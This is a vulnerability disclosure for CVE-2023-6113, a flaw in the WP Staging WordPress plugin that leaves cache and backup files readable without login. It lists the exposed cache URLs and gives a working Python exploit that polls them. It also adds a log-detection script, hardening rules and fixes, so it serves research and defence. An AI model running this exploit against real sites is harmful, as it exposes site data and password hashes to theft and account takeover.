A critical vulnerability has been uncovered in the WP Staging plugin within the directory /wordpress/wp-content/uploads/wp-staging/cache. This vulnerability exposes comprehensive information about the site, including its configuration, directories, and files. More alarmingly, it allows unauthorized access to sensitive data within the database, making it a high-risk security flaw. Exploiting this vulnerability can lead to severe consequences, including potential brute force attacks on password hashes and the compromise of the entire system.

Main info:

CVE: CVE-2023-6113
Plugin: WP Staging (Free < 3.1.3, Pro < 5.1.3)
Critical: Super High
All Time: 2 791 059
Active installations: 80 000+
Publicly Published: December 8, 2023
Last Updated: December 8, 2023
Researcher: Dmitrii Ignatyev
OWASP TOP-10: A3: Sensitive Data Exposure
PoC: Yes
Exploit: Yes
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6113
https://wpscan.com/vulnerability/5a71049a-09a6-40ab-a4e8-44634869d4fb/

Timeline

November 10, 2023: Plugin testing and vulnerability detection in the WP Staging plugin have been completed
November 10, 2023: I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing
November 15, 2023: The author fixed the vulnerability and released the plugin update
November X, 2023: Registered CVE-2023-6113

Discovery of the Vulnerability

A severe vulnerability has been discovered in the directory /wordpress/wp-content/uploads/wp-staging/cache. This flaw not only exposes extensive information about the site, including its configuration, directories, and files, but more critically, it provides unauthorized access to the contents of the database, including its sensitive data. Exploiting this vulnerability poses an imminent threat, leading to potential brute force attacks on password hashes and, subsequently, the compromise of the entire system.

Understanding Directory Listing / Account Takeover attacks

Directory listing refers to the capability of a web server to display the contents of a directory when an index file is absent. In WordPress, this feature can inadvertently expose sensitive information if not properly configured. In the case of the WP Staging plugin, the vulnerability lies in the directory /wordpress/wp-content/uploads/wp-staging/cache, where directory listing is not adequately controlled. Real-world examples demonstrate that attackers can exploit this flaw to gain insight into the site’s structure and, more importantly, access sensitive data.

Exploiting the Directory Listing Vulnerability

Exploiting the WP Staging vulnerability involves leveraging the exposed directory listing to gain unauthorized access to sensitive data. Attackers can use this information to target specific files, including those containing password hashes. With access to password hashes, attackers may launch brute force attacks, attempting to crack passwords and gain control of user accounts, potentially leading to a full account takeover.

POC:

1) The plugin can run backups automatically every 12 hours (in the free version only at 00:00, so an attacker can start the exploit at 23:55). For the speed of the PoC I trigger the backup manually; the cache files it produces are the same as those of an automatic run.

2) The cache files contain a lot of sensitive data and, most importantly, let you download a backup file and load it on your local machine:

http://127.0.0.1/wordpress/wp-content/uploads/wp-staging/cache/backup_filesystem_scan.cache
http://127.0.0.1/wordpress/wp-content/uploads/wp-staging/cache/backup_file_task_uploads.cache
http://127.0.0.1/wordpress/wp-content/uploads/wp-staging/cache/backup_database.cache
http://127.0.0.1/wordpress/wp-content/uploads/wp-staging/cache/task_steps_backup_site_requirements_check.cache
http://127.0.0.1/wordpress/wp-content/uploads/wp-staging/cache/jobCache_backup_job.cache
http://127.0.0.1/wordpress/wp-content/uploads/wp-staging/cache/task_steps_backup_file_task_plugins.cache
http://127.0.0.1/wordpress/wp-content/uploads/wp-staging/cache/task_steps_backup_file_task_uploads.cache
http://127.0.0.1/wordpress/wp-content/uploads/wp-staging/cache/task_steps_backup_file_task_themes.cache
http://127.0.0.1/wordpress/wp-content/uploads/wp-staging/cache/task_steps_backup_filesystem_scan.cache
http://127.0.0.1/wordpress/wp-content/uploads/wp-staging/cache/backup_file_task_otherfiles.cache
http://127.0.0.1/wordpress/wp-content/uploads/wp-staging/cache/backup_site_requirements_check.cache
http://127.0.0.1/wordpress/wp-content/uploads/wp-staging/cache/task_steps_backup_file_task_muplugins.cache
http://127.0.0.1/wordpress/wp-content/uploads/wp-staging/cache/task_steps_backup_file_task_otherfiles.cache
http://127.0.0.1/wordpress/wp-content/uploads/wp-staging/cache/backup_file_task_plugins.cache
http://127.0.0.1/wordpress/wp-content/uploads/wp-staging/cache/backup_file_task_muplugins.cache
http://127.0.0.1/wordpress/wp-content/uploads/wp-staging/cache/task_steps_backup_database.cache
http://127.0.0.1/wordpress/wp-content/uploads/wp-staging/cache/backup_file_task_themes.cache

3) You can download the backup file backups/127.0.0.1_20231113-115916_652cf1eb0541.wpstg; its name is taken from http://127.0.0.1/wordpress/wp-content/uploads/wp-staging/cache/jobCache_backup_job.cache

EXPLOIT (python3):

import requests
import time
import threading

# Cache files that WP Staging writes into the web-accessible uploads directory.
urls = [
    "http://127.0.0.1/wordpress/wp-content/uploads/wp-staging/cache/backup_filesystem_scan.cache",
    "http://127.0.0.1/wordpress/wp-content/uploads/wp-staging/cache/backup_file_task_uploads.cache",
    "http://127.0.0.1/wordpress/wp-content/uploads/wp-staging/cache/backup_database.cache",
    "http://127.0.0.1/wordpress/wp-content/uploads/wp-staging/cache/task_steps_backup_site_requirements_check.cache",
    "http://127.0.0.1/wordpress/wp-content/uploads/wp-staging/cache/jobCache_backup_job.cache",
    "http://127.0.0.1/wordpress/wp-content/uploads/wp-staging/cache/task_steps_backup_file_task_plugins.cache",
    "http://127.0.0.1/wordpress/wp-content/uploads/wp-staging/cache/task_steps_backup_file_task_uploads.cache",
    "http://127.0.0.1/wordpress/wp-content/uploads/wp-staging/cache/task_steps_backup_file_task_themes.cache",
    "http://127.0.0.1/wordpress/wp-content/uploads/wp-staging/cache/task_steps_backup_filesystem_scan.cache",
    "http://127.0.0.1/wordpress/wp-content/uploads/wp-staging/cache/backup_file_task_otherfiles.cache",
    "http://127.0.0.1/wordpress/wp-content/uploads/wp-staging/cache/backup_site_requirements_check.cache",
    "http://127.0.0.1/wordpress/wp-content/uploads/wp-staging/cache/task_steps_backup_file_task_muplugins.cache",
    "http://127.0.0.1/wordpress/wp-content/uploads/wp-staging/cache/task_steps_backup_file_task_otherfiles.cache",
    "http://127.0.0.1/wordpress/wp-content/uploads/wp-staging/cache/backup_file_task_plugins.cache",
    "http://127.0.0.1/wordpress/wp-content/uploads/wp-staging/cache/backup_file_task_muplugins.cache",
    "http://127.0.0.1/wordpress/wp-content/uploads/wp-staging/cache/task_steps_backup_database.cache",
    "http://127.0.0.1/wordpress/wp-content/uploads/wp-staging/cache/backup_file_task_themes.cache"
]

print("The following links are checked:")
for url in urls:
    print(url)

def check_url(url):
    # Poll one URL in a loop: the cache file exists only once a backup job
    # has written it, so keep requesting until the server returns it.
    while True:
        try:
            response = requests.get(url, timeout=10)  # timeout so a stalled connection cannot block the thread
            if response.status_code == 200:
                print(f"File at {url} found! Displaying the contents...")
                print(response.text)
        except requests.RequestException as e:
            print(f"Error when requesting {url}: {e}")

        time.sleep(0.5)

# One polling thread per URL.
for url in urls:
    thread = threading.Thread(target=check_url, args=(url,))
    thread.start()

___

The potential risk associated with this vulnerability is severe. In real-world scenarios, attackers can exploit the exposed directory to perform reconnaissance on the site’s structure and locate critical files. Subsequently, they may target the database to retrieve sensitive information, compromising user data, passwords, and potentially gaining control of administrative accounts. This could lead to unauthorized access, data manipulation, and other malicious activities.
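The reconnaissance described above leaves a clear trace in the web server access log: requests for the WP Staging cache directory itself or for its .cache files. The following detection script is an added example and is not part of the advisory or of the WP Staging plugin. It assumes the site logs in the Apache/nginx "combined" format; the log lines it scans are constructed for the example and are not real traffic.

```python
import re
from collections import Counter
from typing import List, NamedTuple, Optional

# Apache/nginx "combined" access log format (assumption: the site logs in this
# format; adjust the pattern for other formats).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Path of the directory exposed by CVE-2023-6113 (from the advisory).
CACHE_DIR = "/wp-content/uploads/wp-staging/cache/"


class Finding(NamedTuple):
    ip: str
    ts: str
    path: str
    status: int
    kind: str  # "listing-exposed", "cache-file-exposed" or "probe-blocked"


def classify(path: str, status: int) -> Optional[str]:
    """Return the finding kind for a request touching the WP Staging cache
    directory, or None when the request is unrelated."""
    # Drop the query string first so "?x=1" cannot slip past the match.
    path = path.split("?", 1)[0]
    if CACHE_DIR not in path:
        return None
    if status == 200:
        # A 200 on the directory itself means an index listing was served.
        if path.endswith(CACHE_DIR):
            return "listing-exposed"
        return "cache-file-exposed"
    # Any other status (403, 404, ...): the server refused, but the client
    # was probing the path and is still worth recording.
    return "probe-blocked"


def scan_log(lines: List[str]) -> List[Finding]:
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line; a real pipeline would count these
        status = int(m.group("status"))
        kind = classify(m.group("path"), status)
        if kind:
            findings.append(Finding(m.group("ip"), m.group("ts"),
                                    m.group("path"), status, kind))
    return findings


def probes_per_ip(findings: List[Finding]) -> Counter:
    """How many cache-directory requests each client address made."""
    return Counter(f.ip for f in findings)


# Constructed sample log (not real traffic): one ordinary page view, a
# directory-index hit, two cache-file downloads from the same client, and one
# request that a hardened server rejected.
SAMPLE_LOG = """\
203.0.113.10 - - [13/Nov/2023:11:58:01 +0000] "GET /wordpress/ HTTP/1.1" 200 5123
198.51.100.7 - - [13/Nov/2023:11:59:10 +0000] "GET /wordpress/wp-content/uploads/wp-staging/cache/ HTTP/1.1" 200 2210
198.51.100.7 - - [13/Nov/2023:11:59:16 +0000] "GET /wordpress/wp-content/uploads/wp-staging/cache/jobCache_backup_job.cache HTTP/1.1" 200 884
198.51.100.7 - - [13/Nov/2023:11:59:20 +0000] "GET /wordpress/wp-content/uploads/wp-staging/cache/backup_database.cache?x=1 HTTP/1.1" 200 41210
198.51.100.9 - - [13/Nov/2023:12:03:44 +0000] "GET /wordpress/wp-content/uploads/wp-staging/cache/backup_database.cache HTTP/1.1" 403 199
""".splitlines()

if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for f in found:
        print(f"{f.kind:20} {f.ip:15} {f.status} {f.path}")
    print(probes_per_ip(found))
```

Any "listing-exposed" or "cache-file-exposed" finding means data has already left the server and the backup in question should be treated as compromised (password hashes rotated); "probe-blocked" hits show the hardening is working but still identify scanning clients worth rate-limiting.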

Recommendations for Improved Security

  • Directory Indexing Configuration: Disable directory indexing for sensitive directories, ensuring that web servers do not disclose the contents of directories.
  • Regular Security Audits: Conduct regular security audits to identify and address vulnerabilities promptly.
  • Plugin Patching: Ensure that the WP Staging plugin is up-to-date with the latest security patches to address this vulnerability.
  • Database Encryption: Implement encryption for sensitive data stored in the database to protect it even if unauthorized access occurs.

By implementing these security measures, administrators can significantly reduce the risk of unauthorized access and data exposure associated with the WP Staging vulnerability.
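The first recommendation, disabling directory indexing and blocking direct access to the plugin's artefacts, can be applied at the web server even before the plugin is updated. The following Apache 2.4 fragment is an added example, not WP Staging's own configuration; it assumes a .htaccess file placed in wp-content/uploads/wp-staging/ (which covers both the cache/ and backups/ subdirectories named in this advisory) and that AllowOverride permits Options and authorization directives there.

```apache
# Added hardening example (not WP Staging's own configuration).
# Location assumed: wp-content/uploads/wp-staging/.htaccess

# Never serve an auto-generated index listing for this tree.
Options -Indexes

# Refuse direct HTTP access to the plugin's cache and backup artefacts
# (.cache files from the cache/ directory, .wpstg backup archives).
<FilesMatch "\.(cache|wpstg)$">
    Require all denied
</FilesMatch>
```

On nginx the equivalent is `autoindex off;` for the uploads location plus a `location ~ ^/wp-content/uploads/wp-staging/.*\.(cache|wpstg)$ { deny all; }` block. After applying either, confirm with a browser that the cache directory and a known .cache URL both return 403 rather than 200.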


DMITRII I.
CVE-2023-6113 – WP Staging – Unauth Sensitive Data Exposure to Account Takeover – POC/Exploit
